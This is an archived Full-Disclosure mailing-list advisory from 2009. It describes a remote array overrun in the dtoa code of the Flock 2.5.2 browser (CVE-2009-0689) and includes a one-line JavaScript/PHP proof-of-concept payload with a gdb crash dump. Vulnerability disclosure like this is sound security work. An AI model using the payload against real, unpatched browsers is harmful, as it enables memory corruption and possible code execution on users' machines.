lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Fri, 11 Dec 2009 00:44:57 +0100
From: Maksymilian Arciemowicz <>
Subject: SecurityReason: Flock 2.5.2 Remote Array Overrun
 (Arbitrary code execution)

[ Flock 2.5.2 Remote Array Overrun (Arbitrary code execution) ]

Author: Maksymilian Arciemowicz and sp3x
- Dis.: 07.05.2009
- Pub.: 11.12.2009

CVE: CVE-2009-0689
CWE: CWE-119
Risk: High
Remote: Yes

Affected Software:
- Flock 2.5.2

Fixed in:
- Flock 2.5.5

NOTE: Prior versions may also be affected.

Original URL:

--- 0.Description ---
Flock is a web browser built on Mozilla.s Firefox codebase that
specializes in providing social networking and Web 2.0 facilities built
into its user interface. Flock v2.5 was officially released on May 19, 2009.

The Flock browser is available as a free download, and supports
Microsoft Windows, Mac OS X, and Linux platforms.

--- 1. Flock 2.5.2 Remote Array Overrun (Arbitrary code execution) ---
The main problem exist in dtoa implementation. Flock has the same dtoa
as Firefox, SeaMonkey, Chrome, Opera etc.
and it is the same like SREASONRES:20090625.

but fix for SREASONRES:20090625, used by openbsd was not good.
More information about fix for openbsd and similars SREASONRES:20091030,

We can create any number of float, which will overwrite the memory. In
Kmax has defined 15. Functions in dtoa, don't checks Kmax limit, and
it is possible to call 16<= elements of freelist array.

--- 2. Proof of Concept  (PoC) ---
var a=0.<?php echo str_repeat("1",296450); ?>;

Program received signal SIGSEGV, Segmentation fault.
0x67c68740 in js3250!JS_DHashTableEnumerate ()
   from C:\Program Files\Flock\js3250.dll
(gdb) i r
eax            0x964619c7       -1773790777
ecx            0x2      2
edx            0x2      2
ebx            0x2      2
esp            0x20e7f0 0x20e7f0
ebp            0x1      0x1
esi            0x299d700        43636480
edi            0x299d701        43636481
eip            0x67c68740       0x67c68740
eflags         0x210202 [ IF RF ID ]
cs             0x1b     27
ss             0x23     35
ds             0x23     35
Es             0x23     35
fs             0x3b     59
gs             0x0      0

(gdb) x/i 0x67c68740
0x67c68740 <js3250!JS_DHashTableEnumerate+288>:
    mov    0x67ce0458(,%edi,4),%eax
(gdb) x/x $eax
0x964619c7:     Cannot access memory at address 0x964619c7

--- 3. SecurityReason Note ---
Officialy SREASONRES:20090625 has been detected in:
- OpenBSD
- NetBSD
- FreeBSD
- MacOSX
- Google Chrome
- Mozilla Firefox
- Mozilla Seamonkey
- Mozilla Thunderbird
- Mozilla Sunbird
- Mozilla Camino
- KDE (example: konqueror)
- Opera
- K-Meleon
- F-Lock

This list is not yet closed.

--- 4. Fix ---
NetBSD fix (optimal):

OpenBSD fix:

--- 5. Credits ---
Discovered by sp3x and Maksymilian Arciemowicz from

--- 6. Greets ---
Infospec p_e_a pi3

--- 7. Contact ---
- cxib {a.t] securityreason [d0t} com
- sp3x {a.t] securityreason [d0t} com


Download attachment "signature.asc" of type "application/pgp-signature" (164 bytes)

Full-Disclosure - We believe in it.
Hosted and sponsored by Secunia -

Powered by blists - more mailing lists